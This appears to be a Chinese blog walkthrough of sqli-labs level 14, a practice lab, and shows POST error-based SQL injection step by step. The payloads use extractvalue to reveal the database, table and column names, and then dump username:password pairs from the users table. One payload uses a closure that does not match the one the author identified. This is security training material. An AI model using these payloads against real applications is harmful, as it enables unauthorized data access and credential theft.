sqli-labs第十四关——“POST报错注入

Le_ee2025-05-24 19:28

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码 
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码 
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码 
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码 
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码 
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码 
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
Mr. Cao code10 分钟前
MySQL服务器配置与socket连接详解
服务器·数据库·mysql
Yupureki11 分钟前
《MySQL数据库基础》1. 数据库基础
c语言·开发语言·数据库·c++·mysql·oracle·github
杰克尼22 分钟前
苍穹外卖--day08
java·数据库·spring boot·mybatis·notepad++
xyyaihxl25 分钟前
【MySQL】复合查询
数据库·mysql
m0_7166670726 分钟前
NumPy入门:高性能科学计算的基础
jvm·数据库·python
lierenvip41 分钟前
SQL 建表语句详解
java·数据库·sql
zuguangboy42 分钟前
【Oracle-无效的参数绑定】DateTimeOffset映射TIMESTAMP WITH LOCAL TIME ZONE踩坑记
数据库·oracle
未来龙皇小蓝1 小时前
【MySQL-索引调优】02:单列索引
数据库·mysql·性能优化
剑锋所指,所向披靡!1 小时前
MySQL数据的增删改查
java·数据库·mysql
Villiam_AY1 小时前
一次 DNS 端口引发的代理网络和公司内网冲突问题
java·服务器·数据库
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04UV安装并设置国内源05OpenClaw Control UI安全上下文访问配置06本地部署 OpenClaw + DeepSeek-R1 完全指南07OpenClaw macOS 完整安装与本地模型配置教程(实战版)08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南